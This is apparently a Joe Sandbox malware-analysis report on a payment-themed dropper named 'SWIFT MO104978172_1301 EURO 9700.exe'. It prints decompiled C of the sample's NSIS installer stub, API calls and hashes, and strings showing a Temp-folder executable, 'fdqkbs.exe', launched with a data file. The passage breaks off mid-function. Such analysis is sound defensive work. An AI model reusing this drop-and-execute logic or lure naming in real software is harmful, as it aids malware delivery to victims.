								 *((intOrPtr*)(_t111 + 0x3c)) =  *0x420ef4;
								E00406113(0x42a280, _t111 + 4, 0x40);
								return 0;
							}
							goto L32;
						}
						return L"Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004035F8( *0x420ef0);
					if(E004035E2( &_a4, 4) == 0 || _v8 != _a4) {
						goto L32;
					} else {
						goto L28;
					}
				} else {
					do {
						_t107 = _t110;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x42a274) & 0x00007e00) + 0x200;
						if(_t110 >= _t82) {
							_t107 = _t82;
						}
						if(E004035E2(0x418ef0, _t107) == 0) {
							E0040302E(1);
							L32:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x42a274 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E0040302E(0);
							}
							goto L20;
						}
						E00406113( &_v40, 0x418ef0, 0x1c);
						_t89 = _v40;
						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
							_a4 = _a4 | _t89;
							 *0x42a300 =  *0x42a300 | _a4 & 0x00000002;
							_t92 = _v16;
							 *0x42a274 =  *0x420ef0;
							if(_t92 > _t110) {
								goto L32;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t110 = _t92 - 4;
								if(_t107 > _t110) {
									_t107 = _t110;
								}
								goto L20;
							} else {
								break;
							}
						}
						L20:
						if(_t110 <  *0x420f00) {
							_v8 = E00406B22(_v8, 0x418ef0, _t107);
						}
						 *0x420ef0 =  *0x420ef0 + _t107;
						_t110 = _t110 - _t107;
					} while (_t110 != 0);
					_t94 = 0;
					goto L24;
				}
			}

0x004030db
0x004030de
0x004030e1
0x004030fb
0x00403100
0x00403113
0x00403118
0x0040311e
0x00000000
0x00403120
0x00403131
0x00403142
0x00403149
0x00403151
0x00403156
0x00403158
0x00403243
0x00403245
0x00403251
0x00000000
0x00000000
0x0040325a
0x00403286
0x0040328b
0x00403296
0x00403298
0x004032a9
0x004032c4
0x004032cd
0x004032d2
0x004032f1
0x00403301
0x00403313
0x00403318
0x00403320
0x0040332d
0x00403335
0x0040333a
0x0040333c
0x0040333c
0x00403344
0x00403344
0x00403347
0x00403348
0x00403348
0x0040334b
0x0040334d
0x0040334d
0x00403357
0x00403363
0x00000000
0x00403368
0x00000000
0x00403320
0x00000000
0x004032d4
0x00403262
0x00403274
0x00000000
0x00000000
0x00000000
0x00000000
0x0040315e
0x00403163
0x00403168
0x0040316c
0x00403173
0x0040317a
0x0040317c
0x0040317c
0x00403187
0x004032e0
0x00403322
0x00000000
0x00403322
0x00403194
0x00403214
0x00403218
0x0040321d
0x00000000
0x00403214
0x0040319d
0x004031a2
0x004031aa
0x004031d0
0x004031df
0x004031e5
0x004031ea
0x004031f0
0x00000000
0x00000000
0x004031fa
0x00403202
0x00403205
0x0040320a
0x0040320c
0x0040320c
0x00000000
0x00000000
0x00000000
0x00000000
0x004031fa
0x0040321e
0x00403224
0x00403230
0x00403230
0x00403233
0x00403239
0x00403239
0x00403241
0x00000000
0x00403241

APIs

GetTickCount.KERNEL32 ref: 004030E4
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe,00000400), ref: 00403100

Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe,80000000,00000003), ref: 0040615C
Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E

GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe,C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe,80000000,00000003), ref: 00403149
GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328B

Strings

C:\Users\user\AppData\Roaming, xrefs: 0040312B, 00403130, 00403136
C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe, xrefs: 004030EA, 004030F9, 0040310D, 0040312A
C:\Users\user\AppData\Local\Temp\, xrefs: 004030DA, 004032A3
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004032D4
Error launching installer, xrefs: 00403120
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403322
Null, xrefs: 004031C7
soft, xrefs: 004031BE
Inst, xrefs: 004031B5

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming$C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-3494802034
Opcode ID: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
Instruction ID: 6a7077609e6cbe8902eef3654a796be60faa9129f620d49927b75729aeb44cd1
Opcode Fuzzy Hash: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
Instruction Fuzzy Hash: 74710271A40204ABDB20DFB5DD85B9E3AACAB04315F21457FF901B72D2CB789E418B6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405FAE( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"\"C:\\";
				if(_t35 == 0) {
					lstrcatW(E00405F37(E00406668(_t81, L"C:\\Users\\engineer\\AppData\\Local\\Temp")), ??);
				} else {
					E00406668();
				}
				E004068EF(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E0040699E(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00406133(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00406158(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E004056CA(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x42a2e8;
						goto L32;
					} else {
						E00406668(0x40b5f8, _t83);
						E00406668(_t83, _t81);
						E004066A5(_t77, _t81, _t83, "C:\Users\engineer\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
						E00406668(_t83, 0x40b5f8);
						_t64 = E00405CC8("C:\Users\engineer\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x42a2e8 =  &( *0x42a2e8->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E004056CA();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E004056CA(0xffffffea,  *(_t86 - 8));
				 *0x42a314 =  *0x42a314 + 1;
				_t45 = E00403371(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
				 *0x42a314 =  *0x42a314 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E004066A5(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E004066A5(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405CC8();
					goto L29;
				}
				goto L33;
			}

0x0040176f
0x00401776
0x00401782
0x00401785
0x0040178a
0x0040178d
0x00401794
0x004017b0
0x00401796
0x00401797
0x00401797
0x004017b6
0x004017bb
0x004017bb
0x004017bf
0x004017c2
0x004017c7
0x004017c9
0x004017cb
0x004017d0
0x004017d0
0x004017db
0x004017db
0x004017ec
0x004017ee
0x004017ee
0x004017ef
0x004017ef
0x004017f2
0x004017f5
0x004017f8
0x004017f8
0x004017ff
0x0040180e
0x00401813
0x00401816
0x00401819
0x00000000
0x00000000
0x0040181b
0x0040181e
0x00401874
0x00401879
0x004015b6
0x0040292e
0x0040292e
0x00402c2a
0x00402c2d
0x00402c2d
0x00000000
0x00401820
0x00401826
0x0040182d
0x0040183a
0x00401845
0x0040185b
0x0040185b
0x0040185e
0x00000000
0x00401864
0x00401864
0x00401865
0x00401882
0x00402c33
0x00402c33
0x00402c33
0x00401867
0x00401867
0x00401868
0x00401493
0x0040239d
0x0040239d
0x0040239d
0x00401865
0x0040185e
0x00402c35
0x00402c39
0x00402c39
0x00401892
0x00401897
0x004018a5
0x004018aa
0x004018b0
0x004018b4
0x004018b6
0x004018be
0x004018ca
0x004018b8
0x004018b8
0x004018bc
0x00000000
0x00000000
0x004018bc
0x004018d3
0x004018d9
0x004018db
0x00000000
0x004018e1
0x004018e1
0x004018e4
0x004018fc
0x004018e6
0x004018e9
0x004018f2
0x004018f2
0x00401901
0x00401906
0x00402398
0x00000000
0x00402398
0x00000000

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v,"C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v,00000000,00000000,"C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017D5

Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675

Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785

Strings

"C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v, xrefs: 0040178D, 00401796, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906
C:\Users\user\AppData\Local\Temp, xrefs: 0040179E
C:\Users\user\AppData\Local\Temp, xrefs: 00401835, 00401851

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: "C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp
API String ID: 1941528284-3064143381
Opcode ID: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
Instruction ID: 87dd38174d63fc88252c3cacf76d35d2aef1a13c6195c1d88e2760da23471212
Opcode Fuzzy Hash: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
Instruction Fuzzy Hash: DE41B771500205BACF10BBB5CD85DAE7A75EF45328B20473FF422B21E1D63D89619A2E

Uniqueness

Uniqueness Score: -1.00%

Function 004069C5 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004069C5(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}

0x004069dc
0x004069e5
0x004069e7
0x004069e7
0x004069eb
0x004069fe
0x004069f8
0x004069f8
0x004069f8
0x00406a17
0x00406a2b
0x00406a32

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
wsprintfW.USER32 ref: 00406A17
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B

Strings

%s%S.dll, xrefs: 00406A11
UXTHEME, xrefs: 004069CE
\, xrefs: 004069ED

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
Instruction ID: e2ac2e7087162e0187f8b4d6776822ec24d6e31928394cf94a41c199a4feb156
Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
Instruction Fuzzy Hash: 3AF096B154121DA7DB14AB68DD0EF9B366CAB00705F11447EA646F20E0EB7CDA68CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00406BB0 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00406BB0(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M00407602))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
